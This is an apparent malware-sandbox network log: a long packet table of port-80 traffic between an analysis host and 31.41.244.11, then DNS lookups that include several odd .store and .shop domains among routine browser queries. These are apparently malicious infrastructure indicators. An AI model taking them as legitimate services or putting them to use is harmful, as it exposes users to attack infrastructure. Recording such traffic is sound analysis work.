Nov 5, 2024 18:46:11.322386026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322411060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322432995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322618008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322628021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322637081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322654963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322664976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322664976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322676897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322684050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322686911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322698116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322707891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322711945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322719097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322730064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322735071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322740078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322751045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322757006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322762966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322767973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322768927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322781086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322786093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322808981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322825909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322993040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323004007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323021889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323033094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323044062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323044062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323055029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323064089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323065996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323079109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323086023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323132038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323132038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323348045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323359013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323368073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323379040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323388100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323399067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323405027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323410034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323417902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323421955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323427916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323436975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323437929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323448896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323457003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323458910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323476076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323486090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323487997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323496103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323498964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323508024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323523045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323528051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323534012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323543072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323550940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323554993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323565006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323571920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323575974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323585987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323589087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323596001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323625088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323627949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323627949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323637009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.323648930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.323671103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324018955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324029922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324038982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324058056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324069023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324069977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324078083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324079990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324090958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324099064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324106932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324109077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324120045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324130058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324131012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324141979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324148893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324152946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324162006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324167013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324172974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324184895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324203968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324228048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324414968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324425936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324434996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324445963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324455976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324465990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324465990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324481010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324487925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324489117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324502945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324559927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324572086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324582100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324592113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324601889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324614048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324620008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324623108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324635029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324640036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324656963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324666977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324734926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324745893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324754953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324764013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324774027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324779034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324788094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324796915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324805021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324810028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324815989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324824095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324827909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324834108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324839115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324848890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324858904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324867010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324870110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324877977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324887991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324889898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324898958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324902058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324911118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.324923992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.324954033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325324059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325335026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325344086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325355053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325365067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325373888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325376987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325383902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325387001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325401068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325403929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325414896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325419903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325424910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325434923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325443029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325444937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325457096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325459957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325465918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325475931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325484991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325485945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325495958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325496912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325508118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325519085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325521946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325529099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325534105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325540066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325548887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325556993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325558901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325566053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325571060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.325577974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.325603962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326085091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326101065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326111078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326121092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326131105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326132059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326139927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326149940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326159954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326159954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326169968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326179028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326184988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326190948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326200962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326201916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326209068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326211929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326224089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326234102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326236010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326262951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326272964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326450109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326459885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326469898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326478958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326488972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326494932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326498985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326509953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326519012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326520920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326529980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326540947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326540947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326551914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326558113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326569080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326575994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326581001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326591015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326597929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326601028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326610088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326628923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326652050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326663017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326670885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326673031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326689005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326695919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326700926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326708078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326709986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326721907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326730013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326730967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326740980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.326756001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326769114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.326793909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327089071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327106953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327116966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327126026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327137947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327142954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327152014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327153921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327162981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327182055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327191114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327254057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327265978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327275991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327286005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327295065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327301979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327306032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327321053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327322006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327330112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327342033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327351093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327361107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327362061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327372074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327374935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.327383041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327393055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.327403069 CET	80	49804	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 18:46:22.052673101 CET	192.168.2.4	1.1.1.1	0xd897	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.082251072 CET	192.168.2.4	1.1.1.1	0x7b4f	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.129076958 CET	192.168.2.4	1.1.1.1	0xcf2d	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.277677059 CET	192.168.2.4	1.1.1.1	0x506a	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.497376919 CET	192.168.2.4	1.1.1.1	0x53f3	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:22.599431038 CET	192.168.2.4	1.1.1.1	0xb53	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:35.774199963 CET	192.168.2.4	1.1.1.1	0x8ac7	Standard query (0)	worddosofrm.shop	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.540802002 CET	192.168.2.4	1.1.1.1	0xb8a	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.623641014 CET	192.168.2.4	1.1.1.1	0xd36e	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.885333061 CET	192.168.2.4	1.1.1.1	0x5c28	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:37.933110952 CET	192.168.2.4	1.1.1.1	0x596f	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.018361092 CET	192.168.2.4	1.1.1.1	0xd9b	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.588639975 CET	192.168.2.4	1.1.1.1	0x8bd5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:38.588841915 CET	192.168.2.4	1.1.1.1	0x78c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 5, 2024 18:46:42.724198103 CET	192.168.2.4	1.1.1.1	0xb32c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:42.724354982 CET	192.168.2.4	1.1.1.1	0x6fb2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 5, 2024 18:46:42.878778934 CET	192.168.2.4	1.1.1.1	0xeab9	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:42.910811901 CET	192.168.2.4	1.1.1.1	0x2a2f	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:46:47.584726095 CET	192.168.2.4	1.1.1.1	0xbd7	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.585577965 CET	192.168.2.4	1.1.1.1	0xc8e2	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.715733051 CET	192.168.2.4	1.1.1.1	0xa828	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.717314959 CET	192.168.2.4	1.1.1.1	0x996	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:47.744182110 CET	192.168.2.4	1.1.1.1	0x91b3	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 5, 2024 18:46:47.813285112 CET	192.168.2.4	1.1.1.1	0xad9d	Standard query (0)	youtube.com	28	IN (0x0001)	false
Nov 5, 2024 18:46:49.744787931 CET	192.168.2.4	1.1.1.1	0x9c60	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.745197058 CET	192.168.2.4	1.1.1.1	0xd784	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.908298969 CET	192.168.2.4	1.1.1.1	0x8db5	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.927146912 CET	192.168.2.4	1.1.1.1	0xa59	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 18:46:49.930903912 CET	192.168.2.4	1.1.1.1	0xcc62	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
